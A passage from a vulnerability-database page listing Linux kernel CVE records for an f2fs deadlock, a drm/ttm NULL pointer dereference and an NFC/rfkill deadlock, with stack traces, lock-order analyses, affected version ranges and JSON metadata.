lock_acquire+0x120/0x360 kernel/locking/lockdep.c:5868
down_read+0x46/0x2e0 kernel/locking/rwsem.c:1537
f2fs_down_read fs/f2fs/f2fs.h:2278 [inline]
f2fs_lock_op fs/f2fs/f2fs.h:2357 [inline]
f2fs_do_truncate_blocks+0x21c/0x10c0 fs/f2fs/file.c:791
f2fs_truncate_blocks+0x10a/0x300 fs/f2fs/file.c:867
f2fs_truncate+0x489/0x7c0 fs/f2fs/file.c:925
f2fs_evict_inode+0x9f2/0x1b60 fs/f2fs/inode.c:897
evict+0x504/0x9c0 fs/inode.c:810
f2fs_evict_inode+0x1dc/0x1b60 fs/f2fs/inode.c:853
evict+0x504/0x9c0 fs/inode.c:810
dispose_list fs/inode.c:852 [inline]
prune_icache_sb+0x21b/0x2c0 fs/inode.c:1000
super_cache_scan+0x39b/0x4b0 fs/super.c:224
do_shrink_slab+0x6ef/0x1110 mm/shrinker.c:437
shrink_slab_memcg mm/shrinker.c:550 [inline]
shrink_slab+0x7ef/0x10d0 mm/shrinker.c:628
shrink_one+0x28a/0x7c0 mm/vmscan.c:4955
shrink_many mm/vmscan.c:5016 [inline]
lru_gen_shrink_node mm/vmscan.c:5094 [inline]
shrink_node+0x315d/0x3780 mm/vmscan.c:6081
kswapd_shrink_node mm/vmscan.c:6941 [inline]
balance_pgdat mm/vmscan.c:7124 [inline]
kswapd+0x147c/0x2800 mm/vmscan.c:7389
kthread+0x70e/0x8a0 kernel/kthread.c:463
ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158
ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
</TASK>
The root cause is deadlock among four locks as below:
kswapd
- fs_reclaim --- Lock A
- shrink_one
- evict
- f2fs_evict_inode
- sb_start_intwrite --- Lock B
- iput
- evict
- f2fs_evict_inode
- sb_start_intwrite --- Lock B
- f2fs_truncate
- f2fs_truncate_blocks
- f2fs_do_truncate_blocks
- f2fs_lock_op --- Lock C
ioctl
- f2fs_ioc_commit_atomic_write
- f2fs_lock_op --- Lock C
- __f2fs_commit_atomic_write
- __replace_atomic_write_block
- f2fs_get_dnode_of_data
- __get_node_folio
- f2fs_check_nid_range
- f2fs_handle_error
- f2fs_record_errors
- f2fs_down_write --- Lock D
open
- do_open
- do_truncate
- security_inode_need_killpriv
- f2fs_getxattr
- lookup_all_xattrs
- f2fs_handle_error
- f2fs_record_errors
- f2fs_down_write --- Lock D
- f2fs_commit_super
- read_mapping_folio
- filemap_alloc_folio_noprof
- prepare_alloc_pages
- fs_reclaim_acquire --- Lock A
In order to a
---truncated---
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
95fa90c9e5a7f14c2497d5b032544478c9377c3a , < 8bd6dff8b801abaa362272894bda795bf0cf1307
(git)
Affected: 95fa90c9e5a7f14c2497d5b032544478c9377c3a , < 6c3bab5c6261aa22c561ef56b7365959a90e7d91 (git) Affected: 95fa90c9e5a7f14c2497d5b032544478c9377c3a , < 86a85a7b622e6e8dba69810257733ce5eab5ed55 (git) Affected: 95fa90c9e5a7f14c2497d5b032544478c9377c3a , < ca8b201f28547e28343a6f00a6e91fa8c09572fe (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/compress.c",
"fs/f2fs/f2fs.h",
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8bd6dff8b801abaa362272894bda795bf0cf1307",
"status": "affected",
"version": "95fa90c9e5a7f14c2497d5b032544478c9377c3a",
"versionType": "git"
},
{
"lessThan": "6c3bab5c6261aa22c561ef56b7365959a90e7d91",
"status": "affected",
"version": "95fa90c9e5a7f14c2497d5b032544478c9377c3a",
"versionType": "git"
},
{
"lessThan": "86a85a7b622e6e8dba69810257733ce5eab5ed55",
"status": "affected",
"version": "95fa90c9e5a7f14c2497d5b032544478c9377c3a",
"versionType": "git"
},
{
"lessThan": "ca8b201f28547e28343a6f00a6e91fa8c09572fe",
"status": "affected",
"version": "95fa90c9e5a7f14c2497d5b032544478c9377c3a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/compress.c",
"fs/f2fs/f2fs.h",
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid potential deadlock\n\nAs Jiaming Zhang and syzbot reported, there is potential deadlock in\nf2fs as below:\n\nChain exists of:\n \u0026sbi-\u003ecp_rwsem --\u003e fs_reclaim --\u003e sb_internal#2\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n rlock(sb_internal#2);\n lock(fs_reclaim);\n lock(sb_internal#2);\n rlock(\u0026sbi-\u003ecp_rwsem);\n\n *** DEADLOCK ***\n\n3 locks held by kswapd0/73:\n #0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: balance_pgdat mm/vmscan.c:7015 [inline]\n #0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: kswapd+0x951/0x2800 mm/vmscan.c:7389\n #1: ffff8880118400e0 (\u0026type-\u003es_umount_key#50){.+.+}-{4:4}, at: super_trylock_shared fs/super.c:562 [inline]\n #1: ffff8880118400e0 (\u0026type-\u003es_umount_key#50){.+.+}-{4:4}, at: super_cache_scan+0x91/0x4b0 fs/super.c:197\n #2: ffff888011840610 (sb_internal#2){.+.+}-{0:0}, at: f2fs_evict_inode+0x8d9/0x1b60 fs/f2fs/inode.c:890\n\nstack backtrace:\nCPU: 0 UID: 0 PID: 73 Comm: kswapd0 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_circular_bug+0x2ee/0x310 kernel/locking/lockdep.c:2043\n check_noncircular+0x134/0x160 kernel/locking/lockdep.c:2175\n check_prev_add kernel/locking/lockdep.c:3165 [inline]\n check_prevs_add kernel/locking/lockdep.c:3284 [inline]\n validate_chain+0xb9b/0x2140 kernel/locking/lockdep.c:3908\n __lock_acquire+0xab9/0xd20 kernel/locking/lockdep.c:5237\n lock_acquire+0x120/0x360 kernel/locking/lockdep.c:5868\n down_read+0x46/0x2e0 kernel/locking/rwsem.c:1537\n f2fs_down_read fs/f2fs/f2fs.h:2278 [inline]\n f2fs_lock_op fs/f2fs/f2fs.h:2357 [inline]\n f2fs_do_truncate_blocks+0x21c/0x10c0 fs/f2fs/file.c:791\n f2fs_truncate_blocks+0x10a/0x300 fs/f2fs/file.c:867\n f2fs_truncate+0x489/0x7c0 fs/f2fs/file.c:925\n f2fs_evict_inode+0x9f2/0x1b60 fs/f2fs/inode.c:897\n evict+0x504/0x9c0 fs/inode.c:810\n f2fs_evict_inode+0x1dc/0x1b60 fs/f2fs/inode.c:853\n evict+0x504/0x9c0 fs/inode.c:810\n dispose_list fs/inode.c:852 [inline]\n prune_icache_sb+0x21b/0x2c0 fs/inode.c:1000\n super_cache_scan+0x39b/0x4b0 fs/super.c:224\n do_shrink_slab+0x6ef/0x1110 mm/shrinker.c:437\n shrink_slab_memcg mm/shrinker.c:550 [inline]\n shrink_slab+0x7ef/0x10d0 mm/shrinker.c:628\n shrink_one+0x28a/0x7c0 mm/vmscan.c:4955\n shrink_many mm/vmscan.c:5016 [inline]\n lru_gen_shrink_node mm/vmscan.c:5094 [inline]\n shrink_node+0x315d/0x3780 mm/vmscan.c:6081\n kswapd_shrink_node mm/vmscan.c:6941 [inline]\n balance_pgdat mm/vmscan.c:7124 [inline]\n kswapd+0x147c/0x2800 mm/vmscan.c:7389\n kthread+0x70e/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe root cause is deadlock among four locks as below:\n\nkswapd\n- fs_reclaim\t\t\t\t--- Lock A\n - shrink_one\n - evict\n - f2fs_evict_inode\n - sb_start_intwrite\t\t\t--- Lock B\n\n- iput\n - evict\n - f2fs_evict_inode\n - sb_start_intwrite\t\t\t--- Lock B\n - f2fs_truncate\n - f2fs_truncate_blocks\n - f2fs_do_truncate_blocks\n - f2fs_lock_op\t\t\t--- Lock C\n\nioctl\n- f2fs_ioc_commit_atomic_write\n - f2fs_lock_op\t\t\t\t--- Lock C\n - __f2fs_commit_atomic_write\n - __replace_atomic_write_block\n - f2fs_get_dnode_of_data\n - __get_node_folio\n - f2fs_check_nid_range\n - f2fs_handle_error\n - f2fs_record_errors\n - f2fs_down_write\t\t--- Lock D\n\nopen\n- do_open\n - do_truncate\n - security_inode_need_killpriv\n - f2fs_getxattr\n - lookup_all_xattrs\n - f2fs_handle_error\n - f2fs_record_errors\n - f2fs_down_write\t\t--- Lock D\n - f2fs_commit_super\n - read_mapping_folio\n - filemap_alloc_folio_noprof\n - prepare_alloc_pages\n - fs_reclaim_acquire\t--- Lock A\n\nIn order to a\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:21.235Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8bd6dff8b801abaa362272894bda795bf0cf1307"
},
{
"url": "https://git.kernel.org/stable/c/6c3bab5c6261aa22c561ef56b7365959a90e7d91"
},
{
"url": "https://git.kernel.org/stable/c/86a85a7b622e6e8dba69810257733ce5eab5ed55"
},
{
"url": "https://git.kernel.org/stable/c/ca8b201f28547e28343a6f00a6e91fa8c09572fe"
}
],
"title": "f2fs: fix to avoid potential deadlock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71065",
"datePublished": "2026-01-13T15:31:21.235Z",
"dateReserved": "2026-01-13T15:30:19.646Z",
"dateUpdated": "2026-01-13T15:31:21.235Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71083 (GCVE-0-2025-71083)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
drm/ttm: Avoid NULL pointer deref for evicted BOs
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/ttm: Avoid NULL pointer deref for evicted BOs
It is possible for a BO to exist that is not currently associated with a
resource, e.g. because it has been evicted.
When devcoredump tries to read the contents of all BOs for dumping, we need
to expect this as well -- in this case, ENODATA is recorded instead of the
buffer contents.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
09ac4fcb3f255e9225967c75f5893325c116cdbe , < 47a85604a761005d255ae38115ee630cc6931756
(git)
Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < 4b9944493c6d92d7b29cfd83aaf3deb842b8da79 (git) Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < 3d004f7341d4898889801ebb2ef61ffca610dd6f (git) Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < 5a81095d3e1b521ac7cfe3b14d5f149bace3d6e0 (git) Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < b94182b3d7228aec18d069cba56d5982e9bfe1b1 (git) Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < 491adc6a0f9903c32b05f284df1148de39e8e644 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/ttm/ttm_bo_vm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "47a85604a761005d255ae38115ee630cc6931756",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "4b9944493c6d92d7b29cfd83aaf3deb842b8da79",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "3d004f7341d4898889801ebb2ef61ffca610dd6f",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "5a81095d3e1b521ac7cfe3b14d5f149bace3d6e0",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "b94182b3d7228aec18d069cba56d5982e9bfe1b1",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "491adc6a0f9903c32b05f284df1148de39e8e644",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/ttm/ttm_bo_vm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:45.717Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/47a85604a761005d255ae38115ee630cc6931756"
},
{
"url": "https://git.kernel.org/stable/c/4b9944493c6d92d7b29cfd83aaf3deb842b8da79"
},
{
"url": "https://git.kernel.org/stable/c/3d004f7341d4898889801ebb2ef61ffca610dd6f"
},
{
"url": "https://git.kernel.org/stable/c/5a81095d3e1b521ac7cfe3b14d5f149bace3d6e0"
},
{
"url": "https://git.kernel.org/stable/c/b94182b3d7228aec18d069cba56d5982e9bfe1b1"
},
{
"url": "https://git.kernel.org/stable/c/491adc6a0f9903c32b05f284df1148de39e8e644"
}
],
"title": "drm/ttm: Avoid NULL pointer deref for evicted BOs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71083",
"datePublished": "2026-01-13T15:34:46.974Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:45.717Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71079 (GCVE-0-2025-71079)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write
A deadlock can occur between nfc_unregister_device() and rfkill_fop_write()
due to lock ordering inversion between device_lock and rfkill_global_mutex.
The problematic lock order is:
Thread A (rfkill_fop_write):
rfkill_fop_write()
mutex_lock(&rfkill_global_mutex)
rfkill_set_block()
nfc_rfkill_set_block()
nfc_dev_down()
device_lock(&dev->dev) <- waits for device_lock
Thread B (nfc_unregister_device):
nfc_unregister_device()
device_lock(&dev->dev)
rfkill_unregister()
mutex_lock(&rfkill_global_mutex) <- waits for rfkill_global_mutex
This creates a classic ABBA deadlock scenario.
Fix this by moving rfkill_unregister() and rfkill_destroy() outside the
device_lock critical section. Store the rfkill pointer in a local variable
before releasing the lock, then call rfkill_unregister() after releasing
device_lock.
This change is safe because rfkill_fop_write() holds rfkill_global_mutex
while calling the rfkill callbacks, and rfkill_unregister() also acquires
rfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will
wait for any ongoing callback to complete before proceeding, and
device_del() is only called after rfkill_unregister() returns, preventing
any use-after-free.
The similar lock ordering in nfc_register_device() (device_lock ->
rfkill_global_mutex via rfkill_register) is safe because during
registration the device is not yet in rfkill_list, so no concurrent
rfkill operations can occur on this device.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
73a0d12114b4bc1a9def79a623264754b9df698e , < 2e0831e9fc46a06daa6d4d8d57a2738e343130c3
(git)
Affected: 8a9c61c3ef187d8891225f9b932390670a43a0d3 , < e02a1c33f10a0ed3aba855ab8ae2b6c4c5be8012 (git) Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < ee41f4f3ccf8cd6ba3732e867abbec7e6d8d12e5 (git) Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < 6b93c8ab6f6cda8818983a4ae3fcf84b023037b4 (git) Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < 8fc4632fb508432895430cd02b38086bdd649083 (git) Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < f3a8a7c1aa278f2378b2f3a10500c6674dffdfda (git) Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < 1ab526d97a57e44d26fadcc0e9adeb9c0c0182f5 (git) Affected: 5ef16d2d172ee56714cff37cd005b98aba08ef5a (git) Affected: ff169909eac9e00bf1aa0af739ba6ddfb1b1d135 (git) Affected: 47244ac0b65bd74cc70007d8e1bac68bd2baad19 (git) Affected: c45cea83e13699bdfd47842e04d09dd43af4c371 (git) Affected: 307d2e6cebfca9d92f86c8e2c8e3dd4a8be46ba6 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/nfc/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2e0831e9fc46a06daa6d4d8d57a2738e343130c3",
"status": "affected",
"version": "73a0d12114b4bc1a9def79a623264754b9df698e",
"versionType": "git"
},
{
"lessThan": "e02a1c33f10a0ed3aba855ab8ae2b6c4c5be8012",
"status": "affected",
"version": "8a9c61c3ef187d8891225f9b932390670a43a0d3",
"versionType": "git"
},
{
"lessThan": "ee41f4f3ccf8cd6ba3732e867abbec7e6d8d12e5",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"lessThan": "6b93c8ab6f6cda8818983a4ae3fcf84b023037b4",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"lessThan": "8fc4632fb508432895430cd02b38086bdd649083",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"lessThan": "f3a8a7c1aa278f2378b2f3a10500c6674dffdfda",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"lessThan": "1ab526d97a57e44d26fadcc0e9adeb9c0c0182f5",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"status": "affected",
"version": "5ef16d2d172ee56714cff37cd005b98aba08ef5a",
"versionType": "git"
},
{
"status": "affected",
"version": "ff169909eac9e00bf1aa0af739ba6ddfb1b1d135",
"versionType": "git"
},
{
"status": "affected",
"version": "47244ac0b65bd74cc70007d8e1bac68bd2baad19",
"versionType": "git"
},
{
"status": "affected",
"version": "c45cea83e13699bdfd47842e04d09dd43af4c371",
"versionType": "git"
},
{
"status": "affected",
"version": "307d2e6cebfca9d92f86c8e2c8e3dd4a8be46ba6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/nfc/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.82",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.293",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.291",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.256",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.162",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:41.379Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2e0831e9fc46a06daa6d4d8d57a2738e343130c3"
},
{
"url": "https://git.kernel.org/stable/c/e02a1c33f10a0ed3aba855ab8ae2b6c4c5be8012"
},
{
"url": "https://git.kernel.org/stable/c/ee41f4f3ccf8cd6ba3732e867abbec7e6d8d12e5"
},
{
"url": "https://git.kernel.org/stable/c/6b93c8ab6f6cda8818983a4ae3fcf84b023037b4"
},
{
"url": "https://git.kernel.org/stable/c/8fc4632fb508432895430cd02b38086bdd649083"
},
{
"url": "https://git.kernel.org/stable/c/f3a8a7c1aa278f2378b2f3a10500c6674dffdfda"
},
{
"url": "https://git.kernel.org/stable/c/1ab526d97a57e44d26fadcc0e9adeb9c0c0182f5"
}
],
